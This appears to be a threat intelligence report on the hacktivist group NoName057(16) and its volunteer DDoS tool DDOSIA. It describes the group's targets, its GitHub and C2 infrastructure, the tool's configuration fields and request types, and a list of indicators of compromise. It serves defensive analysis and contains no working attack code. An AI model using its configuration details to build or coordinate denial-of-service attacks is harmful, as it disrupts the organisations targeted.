The group has also made use of GitHub to host a variety of illicit activity. This includes using GitHub Pages for freely hosting their DDoS tool website dddosia.github[.]io, and the associated GitHub repositories for hosting the latest version of their tools as advertised in the Telegram channel. Two GitHub profiles of interest are dddosia and kintechi341. Early commits to the ddos_config repo were made in the name of “Роман Омельченко”.

Associated dddosia GitHub Profile
Associated dddosia GitHub Profile

Associated kintechi341 GitHub Profile
Associated kintechi341 GitHub Profile

We reported the abuse of these services to the GitHub Trust & Safety team, who quickly took action as a violation of GitHub’s Terms of Service.

Network

The C2 services are primarily hosted through Neterra, the Bulgarian telecommunications organization, while also making use of No-IP Dynamic DNS services. The current C2 is zig35m48zur14nel40[.]myftp.org at 31.13.195.87. This server is active as of this release.

Targets

Throughout the life of the group, NoName057(16) has focused on targeting Ukraine and NATO member countries. Organizations targeted are commonly critical infrastructure sectors whose operations are vital to the target nation.

Target selection shifts according to current political events. As previously noted, the Polish government was a December target following the Sejm of the Republic of Poland officially recognizing Russia as a state sponsor of terrorism in mid December 2022. At the start of January 2023, a large focus was placed on targeting Lithuanian organizations, primarily in the cargo and shipping sectors. Most recently the actor began focusing on targeting leading Danish financial institutions including Danske Bank, Danmarks Nationalbank, and others reported in the media this week.

On January 11th 2023, we observed the actor begin targeting websites owned by multiple 2023 Czech presidential election candidates. The election is occurring on January 13th and 14th 2023, so timing of the disruption efforts can not be ignored. Specific targets include domains for candidates Pavel Fischer, Marek Hilšer, Jaroslav Bašta, General Petr Pavel, and Danuše Nerudová. Additionally, the Ministry of Foreign Affairs of the Czech Republic website was also targeted at the same time. We have notified Czech CERT upon discovery of the new target list.

Attack Toolkit

NoName057(16) has made use of a number of different tools to conduct their attacks throughout 2022. In September, Avast reported on the threat actor using the Bobik botnet to conduct their DDoS attacks. However, the group appears to primarily seek participation voluntarily through their DDOSIA tool – also referred to by its developer as Dosia and Go Stresser, depending on versioning.

We analyzed two different implementations of DDOSIA: a Python and a Golang implementation. The Python DDOSIA implementation is delivered as a PyInstaller package. The Golang implementation refers to itself internally as Go Stresser.

The internal DDOSIA reference Go Stresser
The internal DDOSIA reference Go Stresser

DDOSIA is a multi-threaded application that conducts denial-of-service attacks against target sites by repeatedly issuing network requests. DDOSIA issues requests as instructed by a configuration file that the malware receives from a C2 server when started. The configuration file is in JSON format and resides at the /client/get_targets URL path on the C2 server. Historical configuration files can be reviewed in archived October and December 2022 server responses.

DDOSIA configuration file (a snippet)
DDOSIA configuration file (a snippet)

For each target site, the configuration file specifies:

  • A unique target identifier in the field id.
  • Target network endpoint information in the fields host, address, and port – a hostname, an IP address, and a port.
  • A network request type and method pairs in the fields type and method. The DDOSIA samples and configuration files we analyzed indicate that the malware supports the request types http, http2, and tcp, and the request methods – HTTP verbs  – GET and POST (for the request types http or http2) and syn (for the request type tcp). Based on a configured type and method, DDOSIA constructs HTTP or TCP network packets (requests) for sending to a target site.
  • A URL path and request body in the fields path and body for network requests of type http or http2. If the path and/or body fields have values, DDOSIA constructs and issues requests with the configured request body to the configured URL path at the target site.
A Python DDOSIA implementation constructs a TCP SYN packet
A Python DDOSIA implementation constructs a TCP SYN packet
A Golang DDOSIA implementation constructs an HTTP POST request
A Golang DDOSIA implementation constructs an HTTP POST request

DDOSIA replaces $_{number} substrings specified in the configuration file with random values that the malware generates when constructing a network request. In a DDOSIA configuration file, $_{number} substrings are typically placed in path fields. The Python implementation of DDOSIA uses templates defined in the randoms field in the configuration file for generating random string values.

A $_{number} substring in a DDOSIA configuration file
A $_{number} substring in a DDOSIA configuration file
The randoms field in a DDOSIA configuration file (a snippet)
The randoms field in a DDOSIA configuration file (a snippet)
A Python DDOSIA implementation generates random values
A Python DDOSIA implementation generates random values

A DDOSIA configuration file specifies URL paths and request bodies that are valid at the respective target sites. This indicates that the DDOSIA operators construct configuration files by first exploring target sites. For example, the URL https://www.defensie[.]nl/actueel/nieuws?pagina={number} is a valid news page iterator at the website of the Dutch Ministry of Defense.

DDOSIA configuration for targeting the Dutch Ministry of Defense
DDOSIA configuration for targeting the Dutch Ministry of Defense

There are additional DDOSIA features to those above that a configuration file may instruct the malware to enable. For example, the use_random_user_agent field instructs DDOSIA to randomly select a user agent from a list of predefined user agents when constructing an HTTP request. Also, the fields activate_by_schedule, started_at and finished_at indicate that a DDOSIA sample can be configured to schedule the sending of network requests over specific date-time intervals. The samples we analyzed do not make use of these configuration parameters but repeatedly send network requests to each target site until terminated.

Predefined DDOSIA user agents
Predefined DDOSIA user agents

We note that there are differences regarding what configuration values and features are supported by different DDOSIA builds and implementations. This indicates that DDOSIA is under continuous development and is subject to frequent changes.

For example, the Golang DDOSIA implementations we analyzed support the network request type http2, whereas their Python counterparts do not implement this support.

An implementation of the http2 network request type
An implementation of the http2 network request type

In addition, Golang DDOSIA implementations authenticate themselves to C2 servers by issuing an HTTP POST request to the /login_new URL path at the servers and terminate if the authentication fails. The Python DDOSIA implementations that we analyzed do not support this feature.

DDOSIA authenticates itself to a C2 server (‘Авторизация пройдена успешно’ translates from Russian to ‘Authorization completed successfully’)
DDOSIA authenticates itself to a C2 server (‘Авторизация пройдена успешно’ translates from Russian to ‘Authorization completed successfully’)

DDOSIA maintains statistics about its operation and success rate – the malware counts the total and the number of successful network requests sent to each target site. In the context of network requests of type http or http2, a request is considered successful if the target site returns the HTTP code 200 (OK).

DDOSIA counts successful HTTP network requests
DDOSIA counts successful HTTP network requests

DDOSIA sends the statistics to the C2 server at regular time intervals – this informs the DDOSIA operators about the overall progress and success of the denial-of-service campaign that the malware conducts. This is likely associated with how the group makes use of a volunteer profit program. They distribute cryptocurrency to the top DDoS contributors, encouraging people to contribute more technical resources for a more powerful attack.

Versions of the tool for macOS and Linux have also been developed. Android versions of the tool can also be found; however, the primary distribution of the group has not officially supported mobile.

Conclusion

NoName057(16) is yet another hacktivist group to emerge following the war in Ukraine. While not technically sophisticated, they can have an impact on service availability– even when generally short lived. What this group represents is an increased interest in volunteer-fueled attacks, while now adding in payments to its most impactful contributors. We expect such groups to continue to thrive in today’s highly contentious political climate.

We would like to thank GitHub’s Trust & Safety team for a quick response following our abuse notification. The actors’ accounts and pages are no longer online.

Indicators of Compromise

Indicator Description
94d7653ff2f4348ff38ff80098682242ece6c407 DDosia.py encoded installer
e786c3a60e591dec8f4c15571dbb536a44f861c5 DDosia.py encoded installer
c86ae9efcd838d7e0e6d5845908f7d09aa2c09f5 December 2022 DDosia PyInstaller
e78ac830ddc7105290af4c1610482a41771d753f December 2022 DDosia PyInstaller
09a3b689a5077bd89331acd157ebe621c8714a89 July 2022 DDosia PyInstaller
8f0b4a8c8829a9a944b8417e1609812b2a0ebbbd dosia_v2_macOSx64 – May 2022
717a034becc125e88dbc85de13e8d650bee907ea dosia_v2_macOSarm64 – May 2022
ef7b0c626f55e0b13fb1dcf8f6601068b75dc205 dosia_v2_linux_x64 – May 2022
b63ce73842e7662f3d48c5b6f60a47e7e2437a11 dosia_v2.0.1.exe – May 2022
5880d25a8fbe14fe7e20d2751c2b963c85c7d8aa dosia_v2.0.1 – May 2022
78248539792bfad732c57c4eec814531642e72a0 dosia_v2.exe – May 2022
1dfc6f6c35e76239a35bfaf0b5a9ec65f8f50522 dosia_win_x64.exe – January 2023
2.57.122.82 C2 Server – Overlaps with Avasts Bobik findings
2.57.122.243 C2 Server – Overlaps with Avasts Bobik findings
109.107.181.130 C2 Server – October 2022 and earlier. Overlaps with Avasts Bobik findings
77.91.122.69 C2 Server – December 2022
31.13.195.87 C2 Server – Mid December to Present Day
tom56gaz6poh13f28[.]myftp.org C2 Domain
zig35m48zur14nel40[.]myftp.org C2 Domain
05716nnm@proton[.]me NoName057(16) Email Address
hxxps://t[.]me/noname05716 NoName057(16) Primary Telegram Channel (open group)
hxxps://t[.]me/nn05716chat NoName057(16) Secondary Telegram Channel (closed group)
hxxps://github[.]com/dddosia Account hosting DDOSIA downloading GitHub Pages site.
dddosia[.]github.io Official DDOSIA download site linked to on actors telegram page.
hxxps://github[.]com/kintechi341 Contributor to the DDOSIA toolkit

❌
❌